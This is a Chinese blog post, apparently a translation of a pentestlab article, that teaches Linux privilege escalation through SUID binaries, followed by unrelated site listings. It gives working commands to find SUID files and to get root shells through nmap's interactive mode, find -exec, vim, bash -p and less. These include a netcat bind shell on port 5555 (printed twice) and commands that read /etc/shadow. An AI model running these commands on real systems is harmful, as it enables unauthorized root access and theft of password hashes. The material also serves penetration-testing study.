Linux提权————利用SUID提权

最新推荐文章于 2024-05-28 15:45:10 发布
最新推荐文章于 2024-05-28 15:45:10 发布
阅读量2.6k 收藏 4
点赞数 1
分类专栏: 技术分享

前言

今天给大家带来的是linux下的提权技巧。

SUID是Linux的一种权限机制,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具来进行root提权。

已知的可用来提权的linux可行性的文件列表如下:

  • Nmap
  • Vim
  • find
  • Bash
  • More
  • Less
  • Nano
  • cp

以下命令可以发现系统上运行的所有SUID可执行文件。具体来说,命令将尝试查找具有root权限的SUID的文件。

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

 

ls -l /usr/bin/nmap
-rwsr-xr-x 1 root root 780676 2008-04-08 10:04 /usr/bin/nmap

NMAP

较旧版本的Nmap(2.02至5.21)具有交互模式,允许用户执行shell命令。由于Nmap在使用root权限执行的二进制文件列表中,因此可以使用交互式控制台来运行具有相同权限的shell。

交互模式可以通过执行Nmap参数" interactive "

nmap --interactive

以下命令将提供一个提升的shell。

nmap> !sh
sh-3.2# whoami
root

 

也可以通过Metasploit模块对Nmap的二进制文件进行权限提升。

exploit/unix/local/setuid_nmap

Find

如果Find命令也是以Suid权限运行的话,则将通过find执行的所有命令都会以root权限执行。

touch pentestlab
find pentestlab -exec whoami \;

大部分Linux操作系统都安装了netcat,因此也可以被利用来将权限提升至root。

find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;

大部分Linux操作系统都安装了netcat,因此也可以被利用来将权限提升至root。

find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;

连接上去就会直接获取到一个Root权限的shell。

netcat 192.168.1.189 5555
id
cat /etc/shadow

VIM

Vim是Linux环境下的一款文件编辑器。但是,如果以SUID运行的话,它会继承root用户的权限,因此可以读取系统上的所有文件。

vim.tiny /etc/shadow


vim.tiny
# Press ESC key
:set shell=/bin/sh
:shell

Bash

以下命令将以root权限打开一个bash shell。

bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(serv

Less

Less和More都执行以用来提权。

less /etc/passwd
!/bin/sh

获取到Root权限

参考资料

https://pentestlab.blog/2017/09/25/suid-executables/

http://blog.csdn.net/haofeifei6/article/details/11516753

威胁情报分析平台

最近在做一些威胁情报分析,apt攻击源分析中,发现了一个很好的平台,给大家推荐一下。

http://www.secange.com/2017/10/%E5%A8%81%E8%83%81%E6%83%85%E6%8A%A5%E5%88%86%E6%9E%90%E5%B9%B3%E5%8F%B0/

平台地址:http://www.vxcube.com

大方子
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
权限提升-linux提权手法总结.zip
05-08
以下是对"权限提升——Linux提权手法总结"的详细说明: 1. **缓冲区溢出(Buffer Overflow)**:这是经典的提权漏洞。当程序处理用户输入时,如果没有正确检查边界,可能会导致内存溢出,从而覆盖函数返回地址,...
SUID提权
热门推荐
一只web狗
07-01 1万+
SUID提权介绍
Linux被曝出SUDO提权漏洞,幸好影响不大
NOSEC2019的博客
10-15 2401
近期,有安全人员发现了Linux sudo命令中的一个安全漏洞,可让普通用户以root权限执行命令。但值得庆幸的是,这个漏洞只能在非标准配置的Linux下生效,大多数Linux服务器不受影响。 在我们开始讨论这个漏洞前,有一些关于sudo命令的工作原理以及相关设置是需要去了解的。 当在Linux操作系统上执行命令时,只有得到许可或者知道root密码,普通用户才可以使用sudo(super use...
简谈SUID提权
最新发布
2401_84466336的博客
05-28 959
SUID (Set UID)是Linux中的一种特殊权限,其功能为用户运行某个程序时,如果该程序有SUID权限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。但是SUID权限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义.​ 在执行过程中,调用者会暂时获得该文件的所有者权限,且该权限只在程序执行的过程中有效. 通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录时,如果ls。
SUID提权
snowlyzz的博客
08-14 1766
久经不衰的SUID提权
SUID提权教程
星虐
11-18 1154
SUID提权教程。
第63天:权限提升-Linux脏牛内核漏洞&SUID&信息收集1
08-03
以上案例展示了多种Linux提权技术,包括利用SUID程序、内核漏洞和自动化脚本。这些方法在实际的渗透测试和安全研究中非常实用,同时也提醒系统管理员需要定期更新系统,修补漏洞,限制不必要的SUID权限,以防止恶意...
Linux基础课件特殊权限设置SUID权限共10页.pdf
11-21
本篇课件聚焦于Linux中的特殊权限——SUID(Set-User-ID)权限,通过10页的内容深入解析这一关键概念。 SUID权限是Linux权限系统中的一个独特特性,允许用户临时获得执行文件所属者的权限。这种权限通常用于提供...
实验报告三-Linux系统多用户管理、进程管理
05-03
实验报告三——Linux系统多用户管理和进程管理,是针对初学者掌握CentOS7操作系统的一次实践教学活动。在这个实验中,学生将深入理解Linux系统如何支持多用户环境,并熟悉相关管理命令,同时学习如何进行进程的管理...
Linux基础课件特殊权限设置SBIT权限共9页.pdf
11-20
本次课件主要聚焦于一个特殊的权限设置——Set-User-ID(SUID)和Set-Group-ID(SGID),以及一个不那么常见的Sticky Bit(SBIT)。这三种权限在特定场景下能提供额外的安全性和功能,下面我们将深入探讨这些概念。 ...
Linux提权SUID提权
CP1024的博客
04-04 3799
Linux提权SUID提权 SUID提权 1. SUID权限只能设置二进制文件 2. 命令执行者要有二进制文件的执行权 3. 命令执行者执行二进制文件时会获得该程序的属主身份 4. SUID权限只在程序执行中有效 即如果root给一个程序赋予了SUID权限,则普通用户在执行该程序过程中,是root权限 cp命令提权 以cp为例,这里给cp添加SUID权限做测试,拥有SUID权限的程序会由rwx变成rws 也可以通过find / -perm -u=s -type f 2>dev/null命令来
Linux suid提权详细总结
2301_76690905的博客
11-11 547
suid(set uid)是linux中的一种特殊权限,suid可以让调用者以文件拥有者身份运行该文件,所以利用suid提权的核心就是运行root用户所拥有的suid的文件,那么运行该文件的时候就得获得root用户的身份了。suid特点是用户运行某个程序时,如果该程序有suid权限,程序运行进程的属主不是发起者,而是程序文件所属的属主。linux引入了3个文件来管理用户组:/etc/passwd存放用户信息。/etc/shadow存放用户密码信息。/etc/group存放组信息。
linux系统suid提权
focus on security
05-19 5526
SUID提权 0x01什么是SUIDSUID (Set UID)是Linux中的一种特殊权限,其功能为用户运行某个程序时,如果该程序有SUID权限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。但是SUID权限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义. ​ 在执行过程中,调用者会暂时获得该文件的所有者权限,且该权限只在程序执行的过程中有效. 通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录时,如果
Linux提权suid
weixin_43995499的博客
03-01 1879
Linux提权suid篇 不知攻,焉知防 一个在安服路上摸索的大三生,记录平时学习笔记 suid前言: 1.只有可以执行的二进制程序文件才能设定SUID权限,非二进制文件设置SUID权限没任何意义. 2.命令执行者要对该程序文件拥有执行(x)权限. 3.命令执行者在执行该程序时获得该程序文件属主的身份. 4.SUID权限只在该程序执行过程中有效,也就是说身份改变只在程序执行过程中有效 实验环境: kali 靶机账号 :muhammad 密码 : nasef START: 靶机自带提权文件suid
内网渗透常用提权方式总结
j1044957016的博客
06-01 7317
内网菜鸡艰难学习,希望一样的菜鸡能省去打开一堆链接的时间吧
渗透测试:Linux提权精讲(四,2024年最新看完这一篇你就懂了
m0_54903333的博客
04-11 962
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
linux利用环境变量提权
m0_63917373的博客
05-04 284
linux环境变量提权 linux提权
Centos8stream使用ansible管理思科交换机
weixin_42444554的博客
12-13 599
ansible管理思科交换机
Linux提权攻略:从信息收集到内核漏洞利用
"这篇文档是关于Linux提权的深度指南,涵盖了多种权限提升技术,包括信息收集、内核漏洞利用、服务权限滥用等,并强调了权限升级在攻防中的重要性。作者提醒读者,该文仅供学习研究,禁止非法攻击。" 在Linux系统中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值